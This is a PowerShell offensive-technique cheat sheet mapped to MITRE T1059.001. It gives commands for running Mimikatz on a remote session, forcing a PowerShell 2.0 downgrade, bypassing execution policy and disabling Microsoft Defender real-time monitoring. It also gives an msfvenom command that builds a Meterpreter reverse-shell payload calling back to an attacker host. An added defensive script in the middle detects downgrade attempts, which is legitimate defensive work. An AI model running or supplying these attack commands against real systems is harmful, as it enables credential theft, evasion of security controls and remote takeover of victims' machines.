PowerShell

MITRE ATT&CK, Execution, Technique T1059.001

Basic Usage

Creating a PowerShell Session

Background: We can establish a persistent remote connection in PowerShell with New-PSSession and attach to it with Enter-PSSession. Reusing one session avoids re-authenticating and creating a new runspace for every command, which makes life significantly easier and reduces overhead.

$s = New-PSSession -ComputerName [IP] -Credential [USER]
Enter-PSSession -Session $s

Executing Scripts Remotely

Background: Invoke-Command runs a local script file inside an existing remote session.

Invoke-Command -Session $s -FilePath C:\Users\Parzival\Desktop\Mimikatz.exe

Enumeration

Enumerate Installed Versions

Background: This can be helpful when determining if a PowerShell downgrade attack will work.

(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngine -Name PowerShellVersion).PowerShellVersion

This matters because, if the PowerShell 2.0 engine is still installed, it can be started directly, and it lacks several of the security protections that the more recent 5.x releases enforce:

powershell.exe -Version 2
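As an added example from the defender's side (not part of the original cheat sheet), the following PowerShell audits a host for the downgrade path just described: it lists the installed engine versions from the same registry key queried above, reports whether the optional v2 engine feature is present, and flags Event ID 400 records in the "Windows PowerShell" log whose EngineVersion is 2.x. The sample messages are constructed; the feature and event-log queries are live and assume a Windows 10/11 host.

```powershell
# Added defender-side example (not from the original page): audit the PowerShell 2.0
# downgrade path. Reads the registry key the page queries, reports the optional v2
# engine feature, and flags Event ID 400 records whose EngineVersion is 2.x, which is
# the artefact a "powershell.exe -Version 2" launch leaves in the "Windows PowerShell" log.

function Get-InstalledPSEngines {
    # One PowerShellEngine subkey per installed engine (1 and/or 3) under HKLM:\SOFTWARE\Microsoft\PowerShell.
    Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngine' -Name PowerShellVersion -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty PowerShellVersion
}

function Test-DowngradeEvent {
    param([string]$Message)
    # Event 400 ("Engine state is changed from None to Available") carries an
    # "EngineVersion=<major>.<minor>" line in its Details block.
    if ($Message -match 'EngineVersion=(\d+)\.') { return ([int]$Matches[1] -eq 2) }
    return $false
}

function Get-DowngradeEvents {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $Since } -ErrorAction SilentlyContinue |
        Where-Object { Test-DowngradeEvent $_.Message } |
        Select-Object TimeCreated, @{ Name = 'HostApplication'; Expression = {
            if ($_.Message -match 'HostApplication=(.+)') { $Matches[1].Trim() } } }
}

# Constructed sample messages (not real log data) so Test-DowngradeEvent can be exercised offline.
$samples = @(
    "Engine state is changed from None to Available.`r`n`r`nDetails:`r`n`tEngineVersion=5.1.19041.1`r`n`tHostApplication=powershell.exe",
    "Engine state is changed from None to Available.`r`n`r`nDetails:`r`n`tEngineVersion=2.0`r`n`tHostApplication=powershell.exe -Version 2"
)
foreach ($m in $samples) {
    $ver = if ($m -match 'EngineVersion=(\S+)') { $Matches[1] } else { '?' }
    "EngineVersion=$ver -> downgrade: $(Test-DowngradeEvent $m)"
}

# Live checks (the feature query needs an elevated session; on Windows Server use Get-WindowsFeature PowerShell-V2).
"Installed engines: $((Get-InstalledPSEngines) -join ', ')"
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
if ($v2) { "V2 engine feature: $($v2.State) (remove with Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root)" }
Get-DowngradeEvents | Format-Table -AutoSize
```

Disabling the MicrosoftWindowsPowerShellV2Root feature removes the engine the downgrade relies on, while the Event ID 400 check catches attempts on hosts where it is still present.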

Offensive PowerShell

Bypassing Execution Policy

Information: Execution policy is not a security boundary. It can be disabled or bypassed in multiple ways and is not a sufficient control to prevent unsigned scripts from being run.

powershell.exe -exec bypass 
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Bypassing Real-time Monitoring

Powershell Set-MpPreference -DisableRealtimeMonitoring $true
Powershell Set-MpPreference -DisableIOAVProtection $true

Meterpreter Shell

msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port
